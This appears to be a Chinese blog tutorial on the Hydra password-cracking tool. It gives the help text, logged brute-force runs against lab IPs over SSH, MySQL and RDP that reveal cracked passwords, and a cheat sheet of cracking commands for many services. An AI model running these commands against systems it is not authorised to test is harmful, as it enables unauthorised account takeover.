zoukankan      html  css  js  c++  java
  • hydra 常用命令解析

    参数说明:

    Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

    Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]

    Options:
    -R restore a previous aborted/crashed session
    -I ignore an existing restore file (don't wait 10 seconds)
    -S perform an SSL connect
    -s PORT if the service is on a different default port, define it here
    -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
    -p PASS or -P FILE try password PASS, or load several passwords from FILE
    -x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help
    -y disable use of symbols in bruteforce, see above
    -e nsr try "n" null password, "s" login as pass and/or "r" reversed login
    -u loop around users, not passwords (effective! implied with -x)
    -C FILE colon separated "login:pass" format, instead of -L/-P options
    -M FILE list of servers to attack, one entry per line, ':' to specify port
    -o FILE write found login/password pairs to FILE instead of stdout
    -b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
    -f / -F exit when a login/pass pair is found (-M: -f per host, -F global)
    -t TASKS run TASKS number of connects in parallel per target (default: 16)
    -T TASKS run TASKS connects in parallel overall (for -M, default: 64)
    -w / -W TIME wait time for a response (32) / between connects per thread (0)
    -c TIME wait time per login attempt over all threads (enforces -t 1)
    -4 / -6 use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
    -v / -V / -d verbose mode / show login+pass for each attempt / debug mode
    -O use old SSL v2 and v3
    -q do not print messages about connection errors
    -U service module usage details
    -h more command line options (COMPLETE HELP)
    server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
    service the service to crack (see below for supported protocols)
    OPT some service modules support additional input (-U for module help)

    Supported services: adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

    Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
    v3.0. The newest version is always available at https://github.com/vanhauser-thc/thc-hydra
    Don't use in military or secret service organizations, or for illegal purposes.
    These services were not compiled in: afp ncp oracle sapr3.

    Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
    E.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://)
    % export HYDRA_PROXY=connect_and_socks_proxylist.txt (up to 64 entries)
    % export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
    % export HYDRA_PROXY_HTTP=proxylist.txt (up to 64 entries)

    Examples:
    hydra -l user -P passlist.txt ftp://192.168.0.1
    hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
    hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
    hydra -l admin -p password ftp://[192.168.0.0/24]/
    hydra -L logins.txt -P pws.txt -M targets.txt ssh

    常用实例:

    SSH暴力破解
    e2a5e@kali:~$ hydra -L /data/dic/user.dic -P /data/dic/password.dic -t 5 192.168.2.235 ssh
    Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

    Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-08-27 09:08:41
    [DATA] max 5 tasks per 1 server, overall 5 tasks, 10 login tries (l:2/p:5), ~2 tries per task
    [DATA] attacking ssh://192.168.2.235:22/
    [22][ssh] host: 192.168.2.235 login: root password: HDXY123!@#
    1 of 1 target successfully completed, 1 valid password found
    Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-08-27 09:08:46

    mysql暴力破解
    e2a5e@kali:~$ hydra -L /data/dic/user.dic -P /data/dic/password.dic -t 5 192.168.2.235 mysql
    Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

    Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-08-27 09:07:25
    [INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
    [DATA] max 4 tasks per 1 server, overall 4 tasks, 8 login tries (l:2/p:4), ~2 tries per task
    [DATA] attacking mysql://192.168.2.235:3306/
    [3306][mysql] host: 192.168.2.235 login: root password: 123456
    1 of 1 target successfully completed, 1 valid password found
    Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-08-27 09:07:26


    远程桌面暴力破解
    e2a5e@kali:~$ hydra -L /data/dic/user.dic -P /data/dic/password.dic -t 1 192.168.2.57 rdp
    Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

    Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-08-27 09:12:10
    [WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
    [DATA] max 1 task per 1 server, overall 1 task, 15 login tries (l:3/p:5), ~15 tries per task
    [DATA] attacking rdp://192.168.2.57:3389/
    [3389][rdp] host: 192.168.2.57 login: administrator password: HDXY123!@#
    1 of 1 target successfully completed, 1 valid password found
    Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-08-27 09:12:11

    其他常用破解命令

    使用hydra破解ssh的密码
    hydra -L users.txt -P password.txt -vV -o ssh.log -e ns IP ssh

    破解https:
    hydra -m /index.php -l username -P pass.txt IP https

    破解teamspeak:
    hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

    破解cisco:
    hydra -P pass.txt IP cisco
    hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

    破解smb:
    hydra -l administrator -P pass.txt IP smb

    破解pop3:
    hydra -l muts -P pass.txt my.pop3.mail pop3

    破解rdp:
    hydra IP rdp -l administrator -P pass.txt -V

    破解http-proxy:
    hydra -l admin -P pass.txt http-proxy://10.36.16.18

    破解telnet
    hydra IP telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V

    破解ftp:
    hydra IP ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
    hydra IP ftp -l 用户名 -P 密码字典 -e ns -vV

    get方式提交,破解web登录:
    hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns IP http-get /admin/
    hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f IP http-get /admin/index.php

  • 相关阅读:
    super与this的比较
    队列学习小结
    最左原则
    show processlist
    循环
    打印偶数
    发布模块
    eval函数
    文件
    模块
  • 原文地址:https://www.cnblogs.com/yyxianren/p/11416307.html
Copyright © 2011-2022 走看看